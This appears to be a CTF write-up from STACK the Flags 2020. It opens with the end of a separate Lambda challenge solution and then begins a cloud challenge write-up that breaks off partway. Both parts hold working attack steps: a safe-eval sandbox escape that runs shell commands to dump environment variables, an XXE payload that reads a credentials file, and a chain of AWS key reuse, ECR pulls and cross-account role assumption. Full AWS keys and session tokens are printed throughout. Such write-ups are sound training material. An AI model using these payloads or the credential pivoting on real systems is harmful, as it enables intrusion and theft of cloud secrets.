The safe-eval package is known to be vulnerable in the past, so let’s also check the package.json file to see what version of safe-eval is being used:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
{
  "name": "pension-shecker-lambda",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "author": "",
  "license": "ISC",
  "dependencies": {
    "safe-eval": "^0.3.0"
  }
}

Indeed, the application uses safe-eval v0.3.0, which is a vulnerable version.

Crafting the Exploit Payload

Let’s examine the proof-of-concept exploit script for CVE-2017-16088 for bypassing the safe-eval sandbox:

var safeEval = require('safe-eval');
safeEval("this.constructor.constructor('return process')().exit()");

This seems to return the process global object which allows us to control the current Node.js process.
Even though safe-eval prevents use of require() directly, we can bypass this restruction by using process.mainModule.require(), which provides an alternative way to retrieve require.main.

Now that we have a good idea on how to perform remote code execution on the AWS Lambda function, let’s also take a closer further at the suspicious GitHub issue at https://github.com/c0v1d-agent-1/tax-rebate-checker/issues/1

One of the libraries used by the function was vulnerable.
Resolved by attaching a WAF to the prod deployment.
WAF will not to be attached staging deployment there is no real impact.

Recall that the application at http://lcyw7.tax-rebate-checker.cf/ issues requests to https://cors-anywhere.herokuapp.com/https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker, which effectively forwards incoming requests to https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker – the prod stage!

If there’s a WAF on the prod stage, perhaps we can first target the non-protected staging deployment first and attempt to bypass the WAF if need be.

Before we can try to obtain remote code execution on the AWS Lambda function instance, we need to correctly format our input to the server.
As discussed previously, the Tax Rebate Checker application accepts a JSON input with both age and salary Base64-encoded.
Now, let’s use curl to run the AWS Lambda function on the staging deployment to try to obtain the environment variables set in the AWS Lambda function instance:

$ curl -X POST \
    -H 'Content-Type: application/json' \
    https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/staging/tax-rebate-checker \
    --data '{"age":"'$(printf "this.constructor.constructor('return process')().mainModule.require('child_process').execSync('env').toString()" | base64 -w 0)'","salary":"'$(printf 1 | base64)'"}'
{"results":"AWS_LAMBDA_FUNCTION_VERSION=$LATEST\nflag=St4g1nG_EnV_I5_th3_W34k3$t_Link\nAWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjENj//////////wEaDmFwLXNvdXRoZWFzdC0xIkYwRAIgDbiXQPR7pS/1Jlq8+CvWJEvBWEdzDgMZgmKXB6MbNzUCIFTQNbDFdxZ0qdOmTskWzFOeLpH12FinODzQ8XWo7CdNKtEBCHEQABoMNjQyOTk4NDY5NzM2IgzR7/iDouxfR0H3mQkqrgFHKpR/iXFoOCMF3wtocpFugLFNFVy+LMmgO6JFK56vSGq6zGwzepfYZTV7vLvRauJG9Y9e4o10bLznWugZt3RyH4cWvvHURygQsI5x8BRFMHtqNna7Q/lSWUJIancjx07sHZimJzdRO1SJu5PTu9wI2NFCW6uSKq6z/hHf0Ed8uCMAnkOtGHuY7jfoC2tWNPlByvrEW2mQzBFFgj2DTL/GdFSpS351lFD35am7nVQwibHH/gU64QHk9LffR6ZXw66N/7g5BRYhWGdKyz53O04vrFmttDusAhofGi8T74C1/3x096S1NtASZfVj3YmDwMYOQ1j4D6wEp8CUh5vc7FhQr9l9E8Zdvt78jqyx8l4Wto3UMirBgJDtfEqq5TbcaDP9FM9l1dInGC9Ch6YLJHIRl9Lwctj0s8pveOj0FTN29/PhpkHGWzl4SYSHKOAj/7h1k2J8Sx1JdtyDTKu+X6ACp1uxwDK2k2W2bnrCGVQ/3C2dTzoAINtX9RSk8DcBczXM75/cSi+3u+ClT3SMlBVzUmlPsm90G7U=\nAWS_LAMBDA_LOG_GROUP_NAME=/aws/lambda/tax-rebate-checker\nLAMBDA_TASK_ROOT=/var/task\nLD_LIBRARY_PATH=/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib\nAWS_LAMBDA_RUNTIME_API=127.0.0.1:9001\nAWS_LAMBDA_LOG_STREAM_NAME=2020/12/10/[$LATEST]36472aa2e8e049cfad80aec03f1cae7f\nAWS_EXECUTION_ENV=AWS_Lambda_nodejs12.x\nAWS_XRAY_DAEMON_ADDRESS=169.254.79.2:2000\nAWS_LAMBDA_FUNCTION_NAME=tax-rebate-checker\nPATH=/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin\nAWS_DEFAULT_REGION=ap-southeast-1\nPWD=/var/task\nAWS_SECRET_ACCESS_KEY=drKOGJQgV4HeWciBrP9CgYyAoJrdoFtTHwg0X//f\nLANG=en_US.UTF-8\nLAMBDA_RUNTIME_DIR=/var/runtime\nAWS_LAMBDA_INITIALIZATION_TYPE=on-demand\nAWS_REGION=ap-southeast-1\nTZ=:UTC\nNODE_PATH=/opt/nodejs/node12/node_modules:/opt/nodejs/node_modules:/var/runtime/node_modules:/var/runtime:/var/task\nAWS_ACCESS_KEY_ID=ASIAZLNNSARUIMCNBHX3\nSHLVL=1\n_AWS_XRAY_DAEMON_ADDRESS=169.254.79.2\n_AWS_XRAY_DAEMON_PORT=2000\n_X_AMZN_TRACE_ID=Root=1-5fd1d8f0-7f0800a731b13cf00a3c8db7;Parent=4c8bd2bd54f1fb14;Sampled=0\nAWS_XRAY_CONTEXT_MISSING=LOG_ERROR\n_HANDLER=index.handler\nAWS_LAMBDA_FUNCTION_MEMORY_SIZE=128\n_=/usr/bin/env\n3.141592653589793"}

Note: The -w 0 arguments for base64 command is required to disable line-wrapping and introducing newlines in the input.

Awesome! We found the flag environment set to St4g1nG_EnV_I5_th3_W34k3$t_Link, and we can get the final flag by wrapping it with the flag format:

govtech-csg{St4g1nG_EnV_I5_th3_W34k3$t_Link}

Last weekend, I participated in STACK the Flags 2020 CTF organized by Government Technology Agency of Singapore (GovTech)’s Cyber Security Group (CSG). In this write-up, I will be discussing one of the cloud challenges with no solves – Share and deploy the containers!.

I was extremely close to solving this particular challenge during the competition, but there were some hiccups along the way and I didn’t manage to solve it within the time limit. :cold_sweat:

In retrospect, the Share and deploy the containers! cloud challenge is…

  • Difficult to solve,
  • Time-consuming to solve,
  • Confusing if you don’t understand what the various cloud services are and how they are being used,
  • Messy if you did not keep track of the details while working on the challenge properly (the sheer amount of information is overwhelming),
  • Using common vulnerabilities and also highlights several bad coding practices
  • Quite well-created despite having some bugs which hindered my progress greatly,
  • Relevant to and reflective of real-world cloud penetration testing (it’s tedious and challenging!)

Overall, it was really fun solving this challenge. Kudos to Tan Kee Hock from GovTech’s CSG for creating this amazing challenge!

Share and deploy the containers!

Description:
An agent reportedly working for COViD has been arrested. In his work laptop, we discovered a note from the agent’s laptop. The note contains a warning message from COViD to him! Can you help to investigate what are the applications the captured agent was developing and what vulnerabilities they are purposefully injecting into the applications?

Discovered Note:
https://secretchannel.blob.core.windows.net/covid-channel/notes-from-covid.txt

Introduction

The note at https://secretchannel.blob.core.windows.net/covid-channel/notes-from-covid.txt has the following content:

Agent 007895421,

COViD wants you to inject vulnerabilities in projects that you are working on. Previously you reported that you are working on two projects the upcoming National Pension Records System (NPRS). Please inject vulnerabilities in the two applications.

Regards,
Handler X

From the note, we now learn that there are two projects in the upcoming National Pension Records System (NPRS) which contains some vulnerabilities.

It’s not immediately clear what the final objective is for this challenge, but let’s just proceed on regardless.

Finding Hidden Azure Blobs

Notice that the URL of the note is in the format http://<storage-account>.blob.core.windows.net/<container>/<blob>, which indicates that the note is stored on Azure Blob storage. If you are unfamiliar with Azure Blob storage, do check out the documentation for Azure Blob storage.

Basically, using Azure Blob storage, one can store blobs (files) in containers (directories) in their storage account (similar to Amazon S3 buckets or Google Cloud Storage buckets). In other words, by examining the Azure Blob URL again, we can deduce that the storage account name is secretchannel, the container name is covid-channel and the blob name is notes-from-covid.txt

Using the Azure Storage REST API, we can fetch additional information about the storage account. I first attempted to list all containers in the storage account by visiting https://secretchannel.blob.core.windows.net/?comp=list, but a ResourceNotFound error is returned, indicating that a public user does not have sufficient privileges to list containers. I then tried to list all blobs in the covid-channel container by visiting https://secretchannel.blob.core.windows.net/covid-channel/?restype=container&comp=list&include=metadata, and the following XML response is returned:

<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ContainerName="https://secretchannel.blob.core.windows.net/covid-channel/">
    <Blobs>
        <Blob>
            <Name>notes-from-covid.txt</Name>
            <Url>https://secretchannel.blob.core.windows.net/covid-channel/notes-from-covid.txt</Url>
            <Properties>
                <Last-Modified>Thu, 19 Nov 2020 10:14:22 GMT</Last-Modified>
                <Etag>0x8D88C73E2D218F9</Etag>
                <Content-Length>285</Content-Length>
                <Content-Type>text/plain</Content-Type>
                <Content-Encoding />
                <Content-Language />
                <Content-MD5>oGU6sX8DewYhX0MDzxGyKg==</Content-MD5>
                <Cache-Control />
                <BlobType>BlockBlob</BlobType>
                <LeaseStatus>unlocked</LeaseStatus>
            </Properties>
            <Metadata />
        </Blob>
        <Blob>
            <Name>project-data.txt</Name>
            <Url>https://secretchannel.blob.core.windows.net/covid-channel/project-data.txt</Url>
            <Properties>
                <Last-Modified>Wed, 02 Dec 2020 16:53:44 GMT</Last-Modified>
                <Etag>0x8D896E2D456CDFD</Etag>
                <Content-Length>385</Content-Length>
                <Content-Type>text/plain</Content-Type>
                <Content-Encoding />
                <Content-Language />
                <Content-MD5>jVr3QLDwS/WlRVCQ0034HQ==</Content-MD5>
                <Cache-Control />
                <BlobType>BlockBlob</BlobType>
                <LeaseStatus>unlocked</LeaseStatus>
            </Properties>
            <Metadata />
        </Blob>
    </Blobs>
    <NextMarker />
</EnumerationResults>

Nice! It appears that public users are permitted to list blobs in the covid-channel container, allowing us to find a hidden blob (project-data.txt) within.

Note: You can also discover and fetch the hidden blob using AzCopy tool instead:

$ ./azcopy cp 'https://secretchannel.blob.core.windows.net/covid-channel/' . --recursive
INFO: Scanning...
INFO: Any empty folders will not be processed, because source and/or destination doesn't have full folder support

Job 8c7b23b9-bfb4-6b97-7e1d-025d3d1d71b8 has started
Log file is located at: /home/cloud/.azcopy/8c7b23b9-bfb4-6b97-7e1d-025d3d1d71b8.log

0.0 %, 0 Done, 0 Failed, 2 Pending, 0 Skipped, 2 Total,


Job 8c7b23b9-bfb4-6b97-7e1d-025d3d1d71b8 summary
Elapsed Time (Minutes): 0.0333
Number of File Transfers: 2
Number of Folder Property Transfers: 0
Total Number of Transfers: 2
Number of Transfers Completed: 2
Number of Transfers Failed: 0
Number of Transfers Skipped: 0
TotalBytesTransferred: 670
Final Job Status: Completed

$ ls -al covid-channel/
total 16
drwxrwxr-x  2 cloud cloud 4096 Dec  8 08:10 .
drwxrwxr-x 10 cloud cloud 4096 Dec  8 08:10 ..
-rw-r--r--  1 cloud cloud  285 Dec  8 08:10 notes-from-covid.txt
-rw-r--r--  1 cloud cloud  385 Dec  8 08:10 project-data.txt

Bye Azure, Hello Amazon Web Services!

Viewing the hidden blob at https://secretchannel.blob.core.windows.net/covid-channel/project-data.txt returns the following contents:

National Pension Records System (NPRS)
* Inject the vulnerabilities in the two NPRS sub-systems.
(Employee Pension Contribution Upload Form and National Pension Registry)
Containers are uploaded.
---> To provide update to Handler X

Generated a set of credentials for the handler to check the work.
-- Access Credentials --
AKIAU65ZHERXMQX442VZ
2mA8r/iVXcb75dbYUQCrqd70CLwo6wjbR7zYSE0i

We can easily identify that the access credentials provided is a pair of AWS access credentials since AWS access key IDs start with either AKIA (for long-term credentials) or ASIA (for tempoaray credentials).

Furthermore, we now learn that NPRS contains two sub-systems, namely the Employee Pension Contribution Upload Form and the National Pension Registry. It is also mentioned that containers are uploaded, which suggests that Docker, Amazon Elastic Container Service (ECS) or Amazon Elastic Container Registry (ECR) may be used.

Before we continue on, here’s a quick overview of the attack path so far: Initial Entrypoint Progress

Enumerating NRPS Handler

To enumerate the actions permitted using the access credentials obtained, I used WeirdAAL (AWS Attack Library) Do follow the setup guide carefully and configure the AWS keypair. Then, run the recon module of WeirdAAL to let it attempt to enumerate all the AWS services and identify which services the user has permissions to use.

$ cat .env
[default]
aws_access_key_id=AKIAU65ZHERXMQX442VZ
aws_secret_access_key=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

$ python3 weirdAAL.py -m recon_all -t nprs-handler
Account Id: 341301470318
AKIAU65ZHERXMQX442VZ : Is NOT a root key
...

$ python3 weirdAAL.py -m list_services_by_key -t nprs-handler
[+] Services enumerated for AKIAU65ZHERXMQX442VZ [+]
ec2.DescribeInstances
ec2.DescribeSecurityGroups
ecr.DescribeRepositories
elasticbeanstalk.DescribeApplicationVersions
elasticbeanstalk.DescribeApplications
elasticbeanstalk.DescribeEnvironments
elasticbeanstalk.DescribeEvents
elb.DescribeLoadBalancers
elbv2.DescribeLoadBalancers
opsworks.DescribeStacks
route53.ListGeoLocations
sts.GetCallerIdentity

The above output refers to the services and the permitted actions by the user (e.g. describe-instances for ec2 service).
For convenience, I also installed and used AWS CLI version 1 to invoke the permitted actions listed above after importing the credentials.

Note: If you are using AWS CLI v2, note that your results may vary due to breaking changes from AWS CLI v1 to v2.

$ pip3 install awscli --upgrade --user

$ aws configure --profile nprs-handler
AWS Access Key ID [None]: AKIAU65ZHERXMQX442VZ
AWS Secret Access Key [None]: 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
Default region name [None]: ap-southeast-1
Default output format [None]:

$ aws sts get-caller-identity --profile nprs-handler
{
    "UserId": "AIDAU65ZHERXD5V25EJ4W",
    "Account": "341301470318",
    "Arn": "arn:aws:iam::341301470318:user/nprs-handler"
}

We can see that it is possible to fetch details about the AWS IAM user nprs-handler in account 341301470318.

Pulling Images from Amazon ECR

Recall that earlier on, we noted the use of containers. If Amazon Elastic Container Registry (ECR) is used, then perhaps we can connect to the ECR and pull the Docker images of the two subsystems!

Using AWS CLI, we can list all repositories in the ECR:

$ aws ecr describe-repositories --profile nprs-handler
{
    "repositories": [
        {
            "repositoryArn": "arn:aws:ecr:ap-southeast-1:341301470318:repository/national-pension-registry",
            "registryId": "341301470318",
            "repositoryName": "national-pension-registry",
            "repositoryUri": "341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/national-pension-registry",
            "createdAt": 1606621276.0,
            "imageTagMutability": "MUTABLE",
            "imageScanningConfiguration": {
                "scanOnPush": false
            },
            "encryptionConfiguration": {
                "encryptionType": "AES256"
            }
        },
        {
            "repositoryArn": "arn:aws:ecr:ap-southeast-1:341301470318:repository/employee-pension-contribution-upload-form",
            "registryId": "341301470318",
            "repositoryName": "employee-pension-contribution-upload-form",
            "repositoryUri": "341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/employee-pension-contribution-upload-form",
            "createdAt": 1606592582.0,
            "imageTagMutability": "MUTABLE",
            "imageScanningConfiguration": {
                "scanOnPush": false
            },
            "encryptionConfiguration": {
                "encryptionType": "AES256"
            }
        }
    ]
}

Great! We can list the image repositories in the Amazon ECR. Following the instructions listed on the documentation for Amazon ECR registries, we can login to the Amazon ECR successfully:

$ aws ecr get-login-password --profile nprs-handler --region ap-southeast-1 | docker login --username AWS --password-stdin 341301470318.dkr.ecr.ap-southeast-1.amazonaws.com
WARNING! Your password will be stored unencrypted in /home/cloud/.docker/config.json.
Configure a credential helper to remove this warning. See
https://docs.docker.com/engine/reference/commandline/login/#credentials-store

Login Succeeded

Now that we have logged in to the Amazon ECR successfully, we can pull the images for both applications from the Amazon ECR and analyse the Docker images later on.

$ docker pull 341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/national-pension-registry:latest
latest: Pulling from national-pension-registry
...
Digest: sha256:fa88b76707f653863d9fbc5c3d8d9cf29ef7479faf14308716d90f1ddca5a276
Status: Downloaded newer image for 341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/national-pension-registry:latest
341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/national-pension-registry:latest

$ docker pull 341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/employee-pension-contribution-upload-form:latest
...
Digest: sha256:609300f7a12939d4a44ed751d03be1f61d4580e685bfc9071da4da1f73af44d8
Status: Downloaded newer image for 341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/employee-pension-contribution-upload-form:latest
341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/employee-pension-contribution-upload-form:latest

Listing Load Balancers & Accessing Contribution Upload Form Web App

Besides being able to access the Amazon ECR, we can also invoke elbv2.DescribeLoadBalancers to enumerate the Elastic Load Balancing (ELB) deployments:

$ aws elbv2 describe-load-balancers --profile nprs-handler
{
    "LoadBalancers": [
        {
            "LoadBalancerArn": "arn:aws:elasticloadbalancing:ap-southeast-1:341301470318:loadbalancer/app/epcuf-cluster-alb/a885789784808790",
            "DNSName": "epcuf-cluster-alb-1647361482.ap-southeast-1.elb.amazonaws.com",
            "CanonicalHostedZoneId": "Z1LMS91P8CMLE5",
            "CreatedTime": "2020-11-29T05:15:27.400Z",
            "LoadBalancerName": "epcuf-cluster-alb",
            "Scheme": "internet-facing",
            "VpcId": "vpc-0edcd7648f616c0eb",
            "State": {
                "Code": "active"
            },
            "Type": "application",
            "AvailabilityZones": [
                {
                    "ZoneName": "ap-southeast-1b",
                    "SubnetId": "subnet-00cf0266992d1a87b",
                    "LoadBalancerAddresses": []
                },
                {
                    "ZoneName": "ap-southeast-1a",
                    "SubnetId": "subnet-0823515e3019418aa",
                    "LoadBalancerAddresses": []
                }
            ],
            "SecurityGroups": [
                "sg-0a35432455c0dcbd8"
            ],
            "IpAddressType": "ipv4"
        }
    ]
}

From the Amazon Resource Name (ARN) of the only Load Balancer deployed, we can easily identify that it is an Application Load Balancer (ALB) by referencing the documentation for the Elastic Load Balancing. The ALB is accessible at http://epcuf-cluster-alb-1647361482.ap-southeast-1.elb.amazonaws.com, and visiting it, we can access the web application for Employee Pension Contribution Upload Form: Employee Pension Contribution Upload Form

Clicking on the Sample document link on the contribution upload form returns a 404 Not Found error page, so likely we need to investigate the docker image for this application to understand its functionalities and hopefully discover some vulnerabilities in the web application.

Analysing Docker Image for Contribution Upload Form

To examine the filesystem of the Docker image, we can simply run the Docker image in a container and execute an interactive shell session in the container:

$ sudo docker run -it 341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/employee-pension-contribution-upload-form /bin/bash
root@5e0d24bea735:/app# ls -alR
.:
total 20
drwxr-xr-x 1 root root 4096 Nov 28 19:45 .
drwxr-xr-x 1 root root 4096 Dec  8 18:37 ..
-rw-r--r-- 1 root root 2735 Nov 28 19:41 app.py
drwxr-xr-x 2 root root 4096 Nov 22 23:12 files
drwxr-xr-x 3 root root 4096 Nov 22 23:12 views

./files:
total 12
drwxr-xr-x 2 root root 4096 Nov 22 23:12 .
drwxr-xr-x 1 root root 4096 Nov 28 19:45 ..
-rw-r--r-- 1 root root  580 Nov 22 23:12 sample-data.xml

...

The source code for /app/app.py is shown below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
from bottle import run, request, post, Bottle, template, static_file
from lxml import etree as etree
import pathlib
import requests
import os

# Will deploy to ECS Cluster hosted on EC2

# Todo: Database Integration
# Database and other relevant credentials will be loaded via the environment file
# Tentative location /app/.env
# For now, just dump all evnironment variables to .env file
env_output = ""
for k, v in os.environ.items():
    env_output += k + "=" + v + "\n"
output_env_file = open(".env", "w")
output_env_file.write(env_output)
output_env_file.close()

current_directory = str(pathlib.Path().absolute())
parser = etree.XMLParser(no_network=False)
app = Bottle()

@app.route('/download/<filename:path>')
def download(filename):
    return static_file(filename, root=current_directory + '/static/files', download=filename)

@app.route('/import',  method='POST')
def import_submission():
    postdata = request.body.read()
    file_name = request.forms.get("xml-data-file")
    data = request.files.get("xml-data-file")
    raw = data.file.read()
    # TODO: validation
    root = etree.fromstring(raw,parser)
    # TODO: save to database
    total = 0
    for contribution in root[0][2]:
        total += int(contribution.text)
    employee = {
        'first_name': root[0][0].text,
        'last_name': root[0][1].text,
        'total_contribution': total
    }
    return template('submission', employee)

# TODO: Webhook for successful import
# Webhook will be used by third party applications.
# Endpoint is not fixed yet, still in staging.
# The other project's development is experiencing delay.

# National Pension Registry is another internal network.
# The machine running this application will have to get the IP whitelisted
# Do check with the NPR dev team on the ip whitelisting

@app.route('/authenticate',  method='POST')
def register():
    endpoint = request.forms.get('endpoint')
    # Endpoint Validation
    username = request.forms.get('username')
    password = request.forms.get('password')
    data = {'username': username, 'password': password}
    res = requests.post(endpoint, data = data)
    return res.text

@app.route('/report',  method='POST')
def submit():
    endpoint = request.forms.get('endpoint')
    # Endpoint Validation
    token = request.forms.get('token')
    usage = request.forms.get('usage')
    contributor_id = request.forms.get('contributor_id')
    constructed_endpoint = endpoint + "?usage=" + usage + "&contributor_id=" + contributor_id
    res = requests.get(constructed_endpoint, headers={'Authorization': 'Bearer ' + token})
    return res.text

@app.route('/',  method='GET')
def index():
    return template('index')

run(app, host='0.0.0.0', port=80, debug=True)

Clearly, the code is very badly written – it’s an amalgamation of numerous bad coding practices found too often :(
Several observations can be made here:

  • The application dumps all environment variables containing “database and other relevant credentials” to /app/.env
  • The XML parser (lxml) used is explicitly allowing network access for related files
  • The /import POST endpoint is vulnerable to XML External Entity (XXE) attacks (the XML parser resolves entities by default), allowing for GET-based Server-Side Request Forgery (SSRF) attacks and arbitrary file disclosure
  • The /authenticate POST endpoint allows for POST-based SSRF with endpoint, username and password params
  • The /report POST endpoint allows for GET-based SSRF using endpoint, usage and contributor_id params
  • Flask debug mode is enabled (debug=True), which may allow for remote code execution (RCE)
  • The other subsystem, National Pension Registry, is another internal network
  • There is some IP whitelisting checks performed by the National Pension Registry application

At this point, we can attempt to guess the IP address or hostname of the National Pension Registry subsystem and use the SSRF vulnerabilities to access the other application. Unfortunately, there is a coding flaw in the application, which causes the application to crash too easily and making it difficult to execute this strategy successfully.

Exploiting XXE to Disclose /app/.env & Obtain AWS IAM Keys

Looking at the possible vulnerabilities to be exploited, we see that we are able to use XXE to read /app/.env to obtain environment variables which may contain “database and other relevant credentials”.

For convenience, we can use the sample document at /app/files/sample-data.xml:

<?xml version="1.0" encoding="ISO-8859-1"?>
<employees>
    <employee>
        <firstname>John</firstname>
        <lastname>Doe</lastname>
        <contributions>
            <january>215</january>
            <february>215</february>
            <march>215</march>
            <april>215</april>
            <may>215</may>
            <june>215</june>
            <july>215</july>
            <august>215</august>
            <september>215</september>
            <october>215</october>
            <november>215</november>
        </contributions>
    </employee>
</employees>

Then, we modify it to include a XXE payload in firstname field as such:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///app/.env">]>
<employees>
    <employee>
        <firstname>&xxe;</firstname>
        <lastname>Doe</lastname>
        <contributions>
            <january>215</january>
            <february>215</february>
            <march>215</march>
            <april>215</april>
            <may>215</may>
            <june>215</june>
            <july>215</july>
            <august>215</august>
            <september>215</september>
            <october>215</october>
            <november>215</november>
        </contributions>
    </employee>
</employees>

After that, we upload it using the Employee Pension Contribution Upload Form, and the file contents of /app/.env will be returned after Full Name: in the response: XXE Response

And we discover the long-term credentials for nprs-cross-handler! :smile:
We have now completed half the challenge :scream:, so let’s pause for a minute and take a quick look at our progress into the challenge thus far before continuing on: Midpoint of Attack Path

Enumerating NRPS Cross Handler

Let’s reconfigure WeirdAAL and AWS CLI to use the new credentials we just obtained for nprs-cross-handler and re-run the recon module of WeirdAAL and list all permitted actions.

$ aws configure --profile nprs-cross-handler
AWS Access Key ID [None]: AKIAU65ZHERXDDIVSXPO
AWS Secret Access Key [None]: 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
Default region name [None]: ap-southeast-1
Default output format [None]:

$ cat .env
[default]
aws_access_key_id = AKIAU65ZHERXDDIVSXPO
aws_secret_access_key = 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

$ python3 weirdAAL.py -m recon_all -t nprs-cross-handler
Account Id: 341301470318
AKIAU65ZHERXDDIVSXPO : Is NOT a root key
...

$ python3 weirdAAL.py -m list_services_by_key -t nprs-cross-handler
[+] Services enumerated for AKIAU65ZHERXDDIVSXPO [+]
elasticbeanstalk.DescribeApplicationVersions
elasticbeanstalk.DescribeApplications
elasticbeanstalk.DescribeEnvironments
elasticbeanstalk.DescribeEvents
opsworks.DescribeStacks
route53.ListGeoLocations
sts.GetCallerIdentity

Using AWS CLI to invoke the respective accessible actions listed above, nothing interesting was found.

Since the automated enumeration did not work well, it is time to fall back to manual enumeration.
I got stuck here during the competition even though I already knew how to get the flag at this point (I just needed the IP address or hostname of the National Pension Registry sub-system) and did everything below, but obtained different results from what I should be seeing. Perhaps, I enumerated using the wrong IAM keys. I don’t actually know either. In hindsight, I guess better note-taking procedures and perhaps removing unused credentials from ~/.aws/credentials could have helped to avoid such an outcome.

Moving on, we enumerate the policies attached to the user nprs-cross-handler to determine what privileges the user has. There are two primary types of identity-based policies, namely Managed Policies and Inline Policies. Basically, Managed Policies allows policies to be attached to multiple IAM identities (users, groups or roles) or AWS resources whereas Inline Policies are can only be attached to one identity only.

To enumerate Inline Policies, we can use the aws iam list-user-policies command:

$ aws iam list-user-policies --user-name nprs-cross-handler --profile nprs-cross-handler

An error occurred (AccessDenied) when calling the ListUserPolicies operation: User: arn:aws:iam::341301470318:user/nprs-cross-handler is not authorized to perform: iam:ListUserPolicies on resource: user nprs-cross-handler

Nope. Let’s enumerate Managed Policies next using the aws iam list-attached-user-policies command:

$ aws iam list-attached-user-policies --user-name nprs-cross-handler
{
    "AttachedPolicies": [
        {
            "PolicyName": "nprs-cross-handler-policy",
            "PolicyArn": "arn:aws:iam::341301470318:policy/nprs-cross-handler-policy"
        }
    ]
}

Seems like there is a managed policy nprs-cross-handler-policy attached to the nprs-cross-handler user.
Let’s retrieve more information about the managed policy discovered.

Note: It’s also a good idea to enumerate all versions of the policies, but since v1 of nprs-cross-handler-policy is irrelevant for this challenge, I will be omitting it for brevity.

$ aws iam get-policy --policy-arn 'arn:aws:iam::341301470318:policy/nprs-cross-handler-policy' --profile nprs-cross-handler
{
    "Policy": {
        "PolicyName": "nprs-cross-handler-policy",
        "PolicyId": "ANPAU65ZHERXBFWDQBCMX",
        "Arn": "arn:aws:iam::341301470318:policy/nprs-cross-handler-policy",
        "Path": "/",
        "DefaultVersionId": "v2",
        "AttachmentCount": 1,
        "PermissionsBoundaryUsageCount": 0,
        "IsAttachable": true,
        "CreateDate": "2020-11-19T01:46:50Z",
        "UpdateDate": "2020-11-29T08:27:10Z"
    }
}

$ aws iam get-policy-version --policy-arn 'arn:aws:iam::341301470318:policy/nprs-cross-handler-policy' --version-id v2 --profile nprs-cross-handler
{
    "PolicyVersion": {
        "Document": {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Sid": "VisualEditor0",
                    "Effect": "Allow",
                    "Action": "iam:ListAttachedUserPolicies",
                    "Resource": "arn:aws:iam::341301470318:user/*"
                },
                {
                    "Sid": "VisualEditor1",
                    "Effect": "Allow",
                    "Action": [
                        "iam:GetPolicy",
                        "iam:GetPolicyVersion"
                    ],
                    "Resource": "arn:aws:iam::341301470318:policy/*"
                },
                {
                    "Sid": "VisualEditor2",
                    "Effect": "Allow",
                    "Action": "sts:AssumeRole",
                    "Resource": "arn:aws:iam::628769934365:role/cross-account-ec2-access"
                }
            ]
        },
        "VersionId": "v2",
        "IsDefaultVersion": true,
        "CreateDate": "2020-11-29T08:27:10Z"
    }
}

It looks like the attached user policy allows the nprs-cross-handler user to assume the role cross-account-ec2-access!
Let’s request for temporary credentials for the assumed role user using aws sts assume-role command.

$ aws sts assume-role --role-arn 'arn:aws:iam::628769934365:role/cross-account-ec2-access' --role-session-name session
{
    "Credentials": {
        "AccessKeyId": "ASIAZEZM3ZQOVCX7EEF4",
        "SecretAccessKey": "NgAGcf1HnpIAjrNdqv3E7XGXy1D9h5AC5IdfTAxj",
        "SessionToken": "FwoGZXIvYXdzENH//////////wEaDHejxi0VSza/b+hi/yKrAYDc6cpf8NeBGGCCXVy6RKbQCvQBVt/OY+97yMxP6oKaMpQWMM4L7vxB3KlLBFLkVM5TEbXZutQrmmGQlFQV1nRSHHk902qTgRGFvewf8yoFfAKKEZZbyxWi0I8eRiaDt1Db6G6W2FyBjEqVR0bZV3DrJefEQ1LJDCNTWU1a3uy2pWu813s4hu09o3RKIAfxuXhh09zr5dK3cJ0UH0gS85Oar2qSIETW0t/NNSjF+MH+BTItGrwf4r3UciOrx8c0eXEP5AascpUy6c/jP5DRa62+tVI2uUirQz6I8OfyPKSu",
        "Expiration": "2020-12-09T08:27:01Z"
    },
    "AssumedRoleUser": {
        "AssumedRoleId": "AROAZEZM3ZQORFHAJAKYS:session",
        "Arn": "arn:aws:sts::628769934365:assumed-role/cross-account-ec2-access/session"
    }
}

Enumerating Cross Account EC2 Access Role

Now that we have temporary credentials for the cross-account-ec2-access role user, let’s reconfigure WeirdAAL and AWS CLI yet again to use the temporary credentials for the assumed role and re-run the recon module of WeirdAAL and list all permitted actions.

$ cat ~/.aws/credentials
[cross-account-ec2-access]
aws_access_key_id=ASIAZEZM3ZQOVCX7EEF4
aws_secret_access_key=NgAGcf1HnpIAjrNdqv3E7XGXy1D9h5AC5IdfTAxj
